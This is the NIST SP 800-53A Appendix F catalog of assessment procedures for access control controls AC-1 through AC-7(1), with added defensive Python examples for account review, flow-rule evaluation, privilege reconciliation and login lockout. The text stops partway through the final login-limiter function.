NIST SP 800-53A Appendix F


APPENDIX F

ASSESSMENT PROCEDURE CATALOG

OBJECTIVES, METHODS, AND OBJECTS FOR ASSESSING SECURITY CONTROLS

This appendix provides a catalog of procedures to assess the security controls and control enhancements in NIST Special Publication 800-53.[1] The assessment procedures listed in Section I are aligned with the security control catalog in Special Publication 800-53.

Assessors should select the appropriate assessment procedures from the catalog in this appendix for the security controls and control enhancements included in the security plan that are to be assessed in a particular assessment. Since the contents of the security plan affect the development of the security assessment plan and the assessment, there will likely be assessment procedures in the catalog that assessors will not use because: (i) the associated security controls or control enhancements are not contained in the security plan for the information system;[2] or (ii) the security controls or control enhancements are not being assessed at this particular time (e.g., during an assessment of a subset of the controls as part of continuous monitoring activities).

In addition to the assessment procedures provided for security controls and control enhancements, the catalog also contains an extended assessment procedure in Section II that is employed by assessors to obtain additional assurance-related evidence to support the grounds for confidence that the security controls are effective in their application. The extended assessment procedure, which follows the assessment procedures in the catalog, can be applied by the organization in a variety of ways depending on how the information system security controls are developed and implemented, and how the organization manages its security control assessment processes. Section 3.3 of this document provides guidance on the application of the extended assessment procedure.

Each assessment procedure consists of one or more assessment objectives, which are used in assessing particular aspects of a security control or control enhancement (or in the case of the extended assessment procedure, aspects of the security control, control enhancement, family of controls, or security controls employed across the organization). Each assessment objective in an assessment procedure contains a unique identifier. For example, CP-3.2 indicates that this is the second assessment objective for security control CP-3. CP-4(2).1 indicates that this is the first assessment objective for the second enhancement for security control CP-4. The extended assessment objectives are numbered sequentially (i.e., EAP.1, EAP.2, EAP.3, EAP.4, EAP.5) and are employed based upon the impact level of the information system.

Assessors should select appropriate assessment methods from the potential assessment methods listed in the assessment procedures for security controls and control enhancements. Appropriate assessment methods are those methods that will most likely produce the evidence needed by assessors to make the determinations necessary to satisfy the specified assessment objectives.[3] It is also important to determine when those methods should be applied with regard to the impact level of the information system being assessed. To assist assessors in making this determination, the assessment procedures in the catalog in Appendix F include a suggested application of the potential assessment methods to a low-impact, moderate-impact, and high-impact information system assessment provided by the designators (L), (M), and (H) respectively. These designations are intended to assist, not limit, assessors in the selection of the most cost-effective assessment methods for the assessment. The designators are provided for each of the impact levels at which security controls/control enhancements are likely to be employed based on anticipated common usage.[4]

It should also be noted that the same assessment object may appear in multiple object lists in a variety of assessment procedures. The same object may be used in multiple contexts to obtain needed information or evidence for a particular aspect of an assessment. Assessors should use the general reference as appropriate to obtain the necessary information to make the specified determinations required by the assessment objective. For example, a reference to access control policy appears in the assessment procedures for AC-2 and AC-7. For assessment procedure AC-2, assessors use the access control policy to find information about that portion of the policy that addresses account management for the information system. For assessment procedure AC-7, assessors use the access control policy to find information about that portion of the policy that addresses unsuccessful login attempts for the information system.

Implementation Tips

TIP #1: Select only those assessment procedures from Appendix F that correspond to the security controls and control enhancements in the approved security plan and that are to be included in the assessment.
TIP #2: The assessment procedures selected from Appendix F are simply exemplary procedures. These procedures should be reviewed and appropriately tailored and supplemented as necessary, in accordance with the guidance in Section 3.3 to adapt the procedures to specific organizational requirements and operating environments.
TIP #3: The assessor applies to each method the values for depth and coverage that are commensurate with the impact level of the information system and the specifics of the determination to be made. The values selected for the depth and coverage attributes indicate how much effort is applied to the assessment (i.e., the rigor, level of intensity, and scope of the activities associated with the assessment).
TIP #4: With respect to the assessment procedures in Appendix F, assessors need apply only those procedures, methods, and objects necessary for making a final determination that a particular security control objective is satisfied or not satisfied (see Section 3.4).
Note #1: NIST Special Publication 800-53A is a companion publication to NIST Special Publication 800-53, not a replacement or update. Special Publication 800-53 remains the definitive NIST recommendation for employing security controls in federal information systems.
Note #2: When assessing agency compliance with NIST guidance, auditors, inspectors general, evaluators, and/or assessors should consider the intent of the security concepts and principles articulated within the particular guidance document and how the agency applied the guidance in the context of its specific mission responsibilities, operational environments, and unique organizational conditions.


Reminder

Whereas a set of potential assessment methods has been included in the following catalog of assessment procedures, these are not intended to be mandatory or exclusive and, depending on the particular circumstances of the information system to be assessed, not all methods may be required, or other assessment methods may also be used. Additionally, the potential assessment objects listed are not intended to be a mandatory set, but rather a set from which the necessary and sufficient set of objects for a given assessment can be selected to make the appropriate determinations.


Section I: Assessment Procedures

FAMILY: Access Control


ASSESSMENT PROCEDURE
AC-1 ACCESS CONTROL POLICY AND PROCEDURES
Control: The organization develops, disseminates, and periodically reviews/updates: (i) a formal, documented, access control policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the access control policy and associated access controls.
Supplemental Guidance: The access control policy and procedures are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The access control policy can be included as part of the general information security policy for the organization. Access control procedures can be developed for the security program in general, and for a particular information system, when required. NIST Special Publication 800-12 provides guidance on security policies and procedures.
AC-1.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization develops and documents access control policy and procedures;
(ii) the organization disseminates access control policy and procedures to appropriate elements within the organization;
(iii) responsible parties within the organization periodically review access control policy and procedures; and
(iv) the organization updates access control policy and procedures when organizational review indicates updates are required.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with access control responsibilities]. (H)
AC-1.2 ASSESSMENT OBJECTIVE:
Determine if:
(i) the access control policy addresses purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance;
(ii) the access control policy is consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and
(iii) the access control procedures address all areas identified in the access control policy and address achieving policy-compliant implementations of all associated access controls.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with access control responsibilities]. (H)


ASSESSMENT PROCEDURE
AC-2 ACCOUNT MANAGEMENT
Control: The organization manages information system accounts, including establishing, activating, modifying, reviewing, disabling, and removing accounts. The organization reviews information system accounts [Assignment: organization-defined frequency, at least annually].
Supplemental Guidance: Account management includes the identification of account types (i.e., individual, group, and system), establishment of conditions for group membership, and assignment of associated authorizations. The organization identifies authorized users of the information system and specifies access rights/privileges. The organization grants access to the information system based on: (i) a valid need-to-know/need-to-share that is determined by assigned official duties and satisfying all personnel security criteria; and (ii) intended system usage. The organization requires proper identification for requests to establish information system accounts and approves all such requests. The organization specifically authorizes and monitors the use of guest/anonymous accounts and removes, disables, or otherwise secures unnecessary accounts. Account managers are notified when information system users are terminated or transferred and associated accounts are removed, disabled, or otherwise secured. Account managers are also notified when users' information system usage or need-to-know/need-to-share changes.
AC-2.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization manages information system accounts, including authorizing, establishing, activating, modifying, reviewing, disabling, and removing accounts;
(ii) the organization defines in the security plan, explicitly or by reference, the frequency of information system account reviews and the frequency is at least annually;
(iii) the organization reviews information system accounts in accordance with organization-defined frequency; and
(iv) the organization initiates required actions on information system accounts based on the review.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing account management; security plan; list of active system accounts along with the name of the individual associated with each account; lists of recently transferred, separated, or terminated employees; list of recently disabled information system accounts along with the name of the individual associated with each account; system-generated records with user IDs and last login date; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with account management responsibilities]. (M) (H)
AC-2(1) ACCOUNT MANAGEMENT
Control Enhancement:
The organization employs automated mechanisms to support the management of information system accounts.
AC-2(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization employs automated mechanisms to support information system account management functions.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Procedures addressing account management; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing account management functions]. (H)
AC-2(2) ACCOUNT MANAGEMENT
Control Enhancement:
The information system automatically terminates temporary and emergency accounts after [Assignment: organization-defined time period for each type of account].
AC-2(2).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, a time period for each type of account after which the information system terminates temporary and emergency accounts; and
(ii) the information system automatically terminates temporary and emergency accounts after organization-defined time period for each type of account.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Security plan; information system design documentation; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing account management functions]. (H)
AC-2(3) ACCOUNT MANAGEMENT
Control Enhancement:
The information system automatically disables inactive accounts after [Assignment: organization-defined time period].
AC-2(3).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, a time period after which the information system disables inactive accounts; and
(ii) the information system automatically disables inactive accounts after organization-defined time period.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Procedures addressing account management; security plan; information system design documentation; information system configuration settings and associated documentation; information system-generated list of last login dates; information system-generated list of active accounts; information system audit records; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing account management functions]. (H)
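The AC-2.1 "Examine" list names the evidence an assessor reconciles by hand: the active account list with each owner's name, the list of separated or terminated employees, and the system-generated last-login dates. The script below is an added illustration of that reconciliation (it is not part of 800-53A and not a NIST tool); it serves both AC-2.1 (accounts of separated users still active) and AC-2(3).1 (accounts idle beyond the organization-defined period that should already have been disabled). The account names, owners, dates, and the 90-day period are constructed sample values, not figures from the document.

```python
from datetime import date, timedelta

# Constructed sample evidence of the kind listed under AC-2.1 "Examine":
# active accounts with their owners, recently separated employees, and
# system-generated last-login dates. None of this is real data.
ACTIVE_ACCOUNTS = {
    "jdoe": "John Doe",
    "asmith": "Alice Smith",
    "bwong": "Bob Wong",
    "svc_backup": "Backup Service",
    "guest01": "Guest Account",
}
SEPARATED_EMPLOYEES = {"Bob Wong"}
LAST_LOGIN = {
    "jdoe": date(2024, 5, 30),
    "asmith": date(2024, 1, 2),
    "bwong": date(2024, 5, 28),
    "svc_backup": date(2024, 5, 31),
    # guest01 has no login record at all
}


def review_accounts(active, separated, last_login, inactivity_days, as_of):
    """Return {account: [reasons]} for every active account that needs action.

    Flags an account when:
    - its owner is on the separated/terminated list (AC-2: such accounts are
      removed, disabled, or otherwise secured);
    - it has no login on record, or its last login is older than the
      organization-defined inactivity period (AC-2(3): it should already be
      disabled by the automated mechanism).
    """
    cutoff = as_of - timedelta(days=inactivity_days)
    findings = {}
    for account, owner in sorted(active.items()):
        reasons = []
        if owner in separated:
            reasons.append("owner separated but account still active")
        login = last_login.get(account)
        if login is None:
            reasons.append("no login on record")
        elif login < cutoff:
            idle = (as_of - login).days
            reasons.append(f"inactive for {idle} days (limit {inactivity_days})")
        if reasons:
            findings[account] = reasons
    return findings


def run_sample_review(inactivity_days=90, as_of=date(2024, 6, 1)):
    # 90 days is a constructed stand-in for the
    # [Assignment: organization-defined time period] of AC-2(3).
    return review_accounts(ACTIVE_ACCOUNTS, SEPARATED_EMPLOYEES, LAST_LOGIN,
                           inactivity_days, as_of)


if __name__ == "__main__":
    for account, reasons in run_sample_review().items():
        print(f"{account}: " + "; ".join(reasons))
```

Every account the script flags is a gap between the evidence and the control statement: a flagged separated owner contradicts the AC-2 requirement that account managers be notified and act on terminations, and a flagged idle account means the AC-2(3) automated disablement did not fire within the defined period. The assessor still confirms the finding against the audit records before recording a determination.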
AC-2(4) ACCOUNT MANAGEMENT
Control Enhancement:
The organization employs automated mechanisms to audit account creation, modification, disabling, and termination actions and to notify, as required, appropriate individuals.
AC-2(4).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization employs automated mechanisms to audit account creation, modification, disabling, and termination actions; and
(ii) the organization employs automated mechanisms to notify, as required, appropriate individuals.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Procedures addressing account management; information system design documentation; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing account management functions]. (H)


ASSESSMENT PROCEDURE
AC-3 ACCESS ENFORCEMENT
Control: The information system enforces assigned authorizations for controlling access to the system in accordance with applicable policy.
Supplemental Guidance: Access control policies (e.g., identity-based policies, role-based policies, rule-based policies) and associated access enforcement mechanisms (e.g., access control lists, access control matrices, cryptography) are employed by organizations to control access between users (or processes acting on behalf of users) and objects (e.g., devices, files, records, processes, programs, domains) in the information system. In addition to controlling access at the information system level, access enforcement mechanisms are employed at the application level, when necessary, to provide increased information security for the organization. Consideration is given to the implementation of a controlled, audited, and manual override of automated mechanisms in the event of emergencies or other serious events. If encryption of stored information is employed as an access enforcement mechanism, the cryptography used is FIPS 140-2 (as amended) compliant. Related security control: SC-13.
AC-3.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the information system enforces assigned authorizations for controlling access to the system in accordance with applicable policy; and
(ii) user privileges on the information system are consistent with the documented user authorizations.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing access enforcement; information system configuration settings and associated documentation; list of assigned authorizations (user privileges); information system audit records; other relevant documents or records]. (L) (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing access enforcement policy]. (M) (H)
AC-3(1) ACCESS ENFORCEMENT
Control Enhancement:
The information system restricts access to privileged functions (deployed in hardware, software, and firmware) and security-relevant information to explicitly authorized personnel.
Enhancement Supplemental Guidance: Explicitly authorized personnel include, for example, security administrators, system and network administrators, and other privileged users. Privileged users are individuals who have access to system control, monitoring, or administration functions (e.g., system administrators, information system security officers, maintainers, system programmers).
AC-3(1).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization explicitly defines privileged functions and security-relevant information for the information system;
(ii) the organization explicitly authorizes personnel access to privileged functions and security-relevant information in accordance with organizational policy; and
(iii) the information system restricts access to privileged functions (deployed in hardware, software, and firmware) and security-relevant information to explicitly authorized personnel (e.g., security administrators).
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing access enforcement; list of privileged functions and security relevant information; information system configuration settings and associated documentation; list of assigned authorizations (user privileges); information system audit records; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing access enforcement policy]. (H)
AC-3(ICS-1) ACCESS ENFORCEMENT
ICS Control Enhancements:
The ICS requires dual authorization, based on approved organizational procedures, to privileged functions that have impacts on facility, public, and environmental safety.
ICS Enhancement Supplemental Guidance: The organization does not employ dual-approval mechanisms when an immediate response is necessary to ensure public and environmental safety.
AC-3(ICS-1).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization explicitly defines privileged functions for the ICS that have impacts on facility, public, and environmental safety; and
(ii) the ICS requires dual authorization, based on approved organizational procedures, to organization-identified privileged functions.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing access enforcement and dual authorization; list of privileged functions for ICS; ICS configuration settings and associated documentation; list of assigned authorizations (user privileges); ICS audit records; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing access enforcement policy]. (H)


ASSESSMENT PROCEDURE
AC-4 INFORMATION FLOW ENFORCEMENT
Control: The information system enforces assigned authorizations for controlling the flow of information within the system and between interconnected systems in accordance with applicable policy.
Supplemental Guidance: Information flow control regulates where information is allowed to travel within an information system and between information systems (as opposed to who is allowed to access the information) and without explicit regard to subsequent accesses to that information. A few, of many, generalized examples of possible restrictions that are better expressed as flow control than access control are: keeping export controlled information from being transmitted in the clear to the Internet, blocking outside traffic that claims to be from within the organization, and not passing any web requests to the Internet that are not from the internal web proxy. Information flow control policies and enforcement mechanisms are commonly employed by organizations to control the flow of information between designated sources and destinations (e.g., networks, individuals, devices) within information systems and between interconnected systems. Flow control is based on the characteristics of the information and/or the information path. Specific examples of flow control enforcement can be found in boundary protection devices (e.g., proxies, gateways, guards, encrypted tunnels, firewalls, and routers) that employ rule sets or establish configuration settings that restrict information system services or provide a packet filtering capability. Related security control: SC-7.
AC-4.1 ASSESSMENT OBJECTIVE:
Determine if the information system enforces assigned authorizations for controlling the flow of information within the system and between interconnected systems in accordance with applicable policy.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing information flow enforcement; information system design documentation; information system configuration settings and associated documentation; information system baseline configuration; list of information flow authorizations; information system audit records; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing information flow enforcement policy]. (H)
AC-4.2 ASSESSMENT OBJECTIVE:
Determine if interconnection agreements address the types of permissible and impermissible flow of information between information systems and the required level of authorization to allow information flow as defined in the information flow enforcement policy and procedures.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing information flow enforcement; information system interconnection agreements; list of information flow control authorizations; other relevant documents or records]. (M) (H)
AC-4(1) INFORMATION FLOW ENFORCEMENT
Control Enhancement:
The information system implements information flow control enforcement using explicit labels on information, source, and destination objects as a basis for flow control decisions.
Enhancement Supplemental Guidance: Information flow control enforcement using explicit labels is used, for example, to control the release of certain types of information.
AC-4(1).1 ASSESSMENT OBJECTIVE:
Determine if the information system implements information flow control enforcement using explicit labels on information, source, and destination objects as a basis for flow control decisions.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing information flow enforcement; information system design documents; information system configuration settings and associated documentation; information system audit records; other relevant documents or records].
Test: [SELECT FROM: Automated mechanisms implementing information flow enforcement policy].
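The AC-4 supplemental guidance gives three restrictions that are more naturally expressed as flow control than as access control: export-controlled information must not cross to the Internet in the clear, outside traffic claiming an internal source is blocked, and web requests to the Internet must originate from the internal web proxy. The evaluator below is an added example (not NIST's, and not any product's rule syntax) that encodes exactly those three rules, with the explicit-label basis of AC-4(1) represented by a `labels` field. The address ranges, the proxy address `10.0.5.10`, and the `Flow` fields are constructed assumptions.

```python
import ipaddress
from dataclasses import dataclass

# Constructed topology: internal address space and the internal web proxy.
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"),
                 ipaddress.ip_network("192.168.0.0/16")]
WEB_PROXY = ipaddress.ip_address("10.0.5.10")
WEB_PORTS = {80, 443}


@dataclass(frozen=True)
class Flow:
    """One information flow as seen by a boundary protection device."""
    src: str
    dst: str
    dst_port: int
    ingress: str                      # "external" or "internal": interface it arrived on
    encrypted: bool = False           # carried inside TLS or an encrypted tunnel
    labels: frozenset = frozenset()   # explicit labels on the information (AC-4(1))


def is_internal(ip_text):
    ip = ipaddress.ip_address(ip_text)
    return any(ip in net for net in INTERNAL_NETS)


# Each rule returns True when the flow violates it.
def export_controlled_in_clear(f):
    return ("export-controlled" in f.labels
            and not is_internal(f.dst) and not f.encrypted)


def spoofed_internal_source(f):
    return f.ingress == "external" and is_internal(f.src)


def web_to_internet_not_via_proxy(f):
    return (not is_internal(f.dst) and f.dst_port in WEB_PORTS
            and ipaddress.ip_address(f.src) != WEB_PROXY)


RULES = [
    ("export-controlled information sent in the clear to the Internet",
     export_controlled_in_clear),
    ("outside traffic claiming an internal source address",
     spoofed_internal_source),
    ("web request to the Internet not originating from the web proxy",
     web_to_internet_not_via_proxy),
]


def decide(flow):
    """First matching restriction wins; return (action, reason)."""
    for reason, violates in RULES:
        if violates(flow):
            return ("deny", reason)
    return ("allow", "no flow restriction matched")


if __name__ == "__main__":
    samples = [
        Flow("10.0.1.7", "198.51.100.20", 443, "internal"),
        Flow("10.0.5.10", "198.51.100.20", 443, "internal", encrypted=True),
        Flow("10.0.0.9", "10.0.1.20", 22, "external"),
    ]
    for s in samples:
        print(s.src, "->", s.dst, decide(s))
```

The rules look only at where the information is going and what it is labelled, never at who the user is, which is the distinction the guidance draws between flow control and access control. An assessor testing AC-4.1 would feed such a device flows on both sides of each rule and compare the decisions and the resulting audit records against the list of information flow authorizations.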
AC-4(2) INFORMATION FLOW ENFORCEMENT
Control Enhancement:
The information system implements information flow control enforcement using protected processing domains (e.g., domain type-enforcement) as a basis for flow control decisions.
AC-4(2).1 ASSESSMENT OBJECTIVE:
Determine if the information system implements information flow control enforcement using protected processing domains (e.g., domain type-enforcement) as a basis for flow control decisions.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing information flow enforcement; information system design documents; information system configuration settings and associated documentation; information system audit records; other relevant documents or records].
Test: [SELECT FROM: Automated mechanisms implementing information flow enforcement policy].
AC-4(3) INFORMATION FLOW ENFORCEMENT
Control Enhancement:
The information system implements information flow control enforcement using dynamic security policy mechanisms as a basis for flow control decisions.
AC-4(3).1 ASSESSMENT OBJECTIVE:
Determine if the information system implements information flow control enforcement using dynamic security policy mechanisms as a basis for flow control decisions.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing information flow enforcement; information system design documents; information system configuration settings and associated documentation; information system audit records; other relevant documents or records].
Test: [SELECT FROM: Automated mechanisms implementing information flow enforcement policy].


ASSESSMENT PROCEDURE
AC-5 SEPARATION OF DUTIES
Control: The information system enforces separation of duties through assigned access authorizations.
Supplemental Guidance: The organization establishes appropriate divisions of responsibility and separates duties as needed to eliminate conflicts of interest in the responsibilities and duties of individuals. There is access control software on the information system that prevents users from having all of the necessary authority or information access to perform fraudulent activity without collusion. Examples of separation of duties include: (i) mission functions and distinct information system support functions are divided among different individuals/roles; (ii) different individuals perform information system support functions (e.g., system management, systems programming, quality assurance/testing, configuration management, and network security); and (iii) security personnel who administer access control functions do not administer audit functions.
AC-5.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization establishes appropriate divisions of responsibility and separates duties as needed to eliminate conflicts of interest in the responsibilities and duties of individuals; and
(ii) the information system enforces separation of duties through assigned access authorizations.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing divisions of responsibility and separation of duties; information system configuration settings and associated documentation; list of divisions of responsibility and separation of duties; information system audit records; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with responsibilities for defining appropriate divisions of responsibility and separation of duties]. (H)
Test: [SELECT FROM: Automated mechanisms implementing separation of duties policy]. (H)


ASSESSMENT PROCEDURE
AC-6 LEAST PRIVILEGE
Control: The information system enforces the most restrictive set of rights/privileges or accesses needed by users (or processes acting on behalf of users) for the performance of specified tasks.
Supplemental Guidance: The organization employs the concept of least privilege for specific duties and information systems (including specific ports, protocols, and services) in accordance with risk assessments as necessary to adequately mitigate risk to organizational operations, organizational assets, and individuals.
AC-6.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization assigns the most restrictive set of rights/privileges or accesses needed by users for the performance of specified tasks; and
(ii) the information system enforces the most restrictive set of rights/privileges or accesses needed by users.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing least privilege; list of assigned access authorizations (user privileges); information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with responsibilities for defining least privileges necessary to accomplish specified tasks]. (H)
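AC-3.1(ii) asks whether user privileges on the system are consistent with the documented authorizations, AC-3(1).1 whether only explicitly authorized personnel hold privileged functions, and AC-6.1 whether each user holds no more than the most restrictive set needed. All three determinations reduce to comparing the "list of assigned authorizations" against the privileges actually configured. The reconciliation below is an added example (not from 800-53A or any product); the users, privilege names, and authorization lists are constructed sample evidence.

```python
# Constructed evidence: the documented authorizations an assessor examines
# ("list of assigned authorizations (user privileges)") versus the privileges
# actually configured on the system, plus the organization's list of
# privileged functions and the personnel explicitly authorized for them.
DOCUMENTED = {
    "jdoe": {"read_reports", "submit_timesheet"},
    "asmith": {"read_reports", "submit_timesheet", "manage_users"},
    "ops_admin": {"manage_users", "edit_firewall_rules", "read_audit_log"},
}
ACTUAL = {
    "jdoe": {"read_reports", "submit_timesheet", "edit_firewall_rules"},
    "asmith": {"read_reports", "manage_users"},
    "ops_admin": {"manage_users", "edit_firewall_rules", "read_audit_log"},
    "tmp_contractor": {"read_reports"},
}
PRIVILEGED_FUNCTIONS = {"manage_users", "edit_firewall_rules", "read_audit_log"}
AUTHORIZED_FOR_PRIVILEGED = {"asmith", "ops_admin"}


def reconcile(documented, actual, privileged, authorized_for_privileged):
    """Return a sorted list of (user, finding, privileges) tuples.

    Findings map to the assessment objectives as follows:
    - undocumented_account / excess_privilege: AC-3.1(ii) and AC-6.1, the
      system grants more than the documented, least-privilege set;
    - documented_but_not_configured: AC-3.1(ii), documentation and system
      disagree (not an over-grant, but still an inconsistency to resolve);
    - privileged_function_without_explicit_authorization: AC-3(1).1.
    """
    findings = []
    for user in sorted(set(documented) | set(actual)):
        doc = documented.get(user, set())
        act = actual.get(user, set())
        if user not in documented:
            findings.append((user, "undocumented_account", frozenset(act)))
        else:
            if act - doc:
                findings.append((user, "excess_privilege", frozenset(act - doc)))
            if doc - act:
                findings.append((user, "documented_but_not_configured",
                                 frozenset(doc - act)))
        held = act & privileged
        if held and user not in authorized_for_privileged:
            findings.append((user,
                             "privileged_function_without_explicit_authorization",
                             frozenset(held)))
    return findings


if __name__ == "__main__":
    for user, finding, privs in reconcile(DOCUMENTED, ACTUAL,
                                          PRIVILEGED_FUNCTIONS,
                                          AUTHORIZED_FOR_PRIVILEGED):
        print(f"{user:15s} {finding:50s} {sorted(privs)}")
```

A clean run (no findings) supports a "satisfied" determination for the consistency part of AC-3.1 and AC-6.1 only for the objects actually compared; the assessor still has to judge, with the interview evidence, whether the documented set itself is the most restrictive one the tasks require.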


ASSESSMENT PROCEDURE
AC-7 UNSUCCESSFUL LOGIN ATTEMPTS
Control: The information system enforces a limit of [Assignment: organization-defined number] consecutive invalid access attempts by a user during a [Assignment: organization-defined time period] time period. The information system automatically [Selection: locks the account/node for an [Assignment: organization-defined time period], delays next login prompt according to [Assignment: organization-defined delay algorithm]] when the maximum number of unsuccessful attempts is exceeded.
Supplemental Guidance: Due to the potential for denial of service, automatic lockouts initiated by the information system are usually temporary and automatically release after a predetermined time period established by the organization.
AC-7.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, the maximum number of consecutive invalid access attempts to the information system by a user and the time period in which the consecutive invalid access attempts occur;
(ii) the information system enforces the organization-defined limit of consecutive invalid access attempts by a user during the organization-defined time period;
(iii) the organization defines in the security plan, explicitly or by reference, the time period for lock out mode or delay period;
(iv) the organization selects either a lock out mode for the organization-defined time period or delays next login prompt for the organization-defined delay period for information system responses to consecutive invalid access attempts; and
(v) the information system enforces the organization-selected lock out mode or delayed login prompt.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing unsuccessful logon attempts; security plan; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (L) (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing the access control policy for unsuccessful login attempts]. (M) (H)
AC-7(1) UNSUCCESSFUL LOGIN ATTEMPTS
Control Enhancement:
The information system automatically locks the account/node until released by an administrator when the maximum number of unsuccessful attempts is exceeded.
AC-7(1).1 ASSESSMENT OBJECTIVE:
Determine if the information system automatically locks the account/node until released by an administrator when the maximum number of unsuccessful login attempts is exceeded.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing unsuccessful logon attempts; information system design documentation; information system configuration settings and associated documentation; list of information system accounts; information system audit records; other relevant documents or records].
Test: [SELECT FROM: Automated mechanisms implementing the access control policy for unsuccessful login attempts].
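The mechanism that AC-7 and AC-7(1) describe, as an added illustration (example code written for this page, not NIST's or any product's): consecutive failures are counted inside the organization-defined window, and once the limit is exceeded the system applies the selected response, a temporary lock that releases automatically, a delayed next prompt computed by a delay algorithm, or (AC-7(1)) a lock held until an administrator releases it. The parameter values, user names, and the rule that the lock triggers on the (N+1)th failure are assumptions made for the example.

```python
"""Login-attempt limiter modelling the AC-7 / AC-7(1) selections (illustrative only)."""
import math
import time
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional


@dataclass
class Policy:
    max_attempts: int        # [Assignment: organization-defined number] of consecutive invalid attempts
    window_seconds: float    # [Assignment: organization-defined time period] in which they are counted
    response: str            # [Selection]: "lock" or "delay" (AC-7), "admin_release" (AC-7(1))
    lock_seconds: float = 0.0                                  # lock duration for response == "lock"
    delay_algorithm: Optional[Callable[[int], float]] = None   # seconds of delay for the k-th excess failure


@dataclass
class AccountState:
    failures: List[float] = field(default_factory=list)  # timestamps of consecutive failures
    locked_until: Optional[float] = None                  # None = not locked; math.inf = until admin release
    next_prompt_at: float = 0.0                           # earliest time the next login prompt is offered


class LoginLimiter:
    """Per-user enforcement of the policy; the clock is injectable so behaviour is testable."""

    def __init__(self, policy: Policy, clock: Callable[[], float] = time.monotonic):
        self.policy = policy
        self.clock = clock
        self.accounts: Dict[str, AccountState] = {}

    def attempt(self, user: str, credentials_ok: bool) -> str:
        """Record one access attempt; returns 'success', 'failure', 'locked' or 'delayed'.

        Lock and delay are checked before the credential is evaluated, so a correct
        password presented during a lock does not open the account.
        """
        now = self.clock()
        st = self.accounts.setdefault(user, AccountState())
        pol = self.policy

        if st.locked_until is not None:
            if now < st.locked_until:
                return "locked"
            st.locked_until = None      # temporary lock expired: automatic release
            st.failures.clear()

        if now < st.next_prompt_at:
            return "delayed"

        # Only failures inside the organization-defined window count as consecutive.
        st.failures = [t for t in st.failures if now - t <= pol.window_seconds]

        if credentials_ok:
            st.failures.clear()
            st.next_prompt_at = 0.0
            return "success"

        st.failures.append(now)
        excess = len(st.failures) - pol.max_attempts
        if excess <= 0:
            return "failure"   # limit not yet exceeded (assumption: exceeded means N+1 failures)

        if pol.response == "lock":
            st.locked_until = now + pol.lock_seconds
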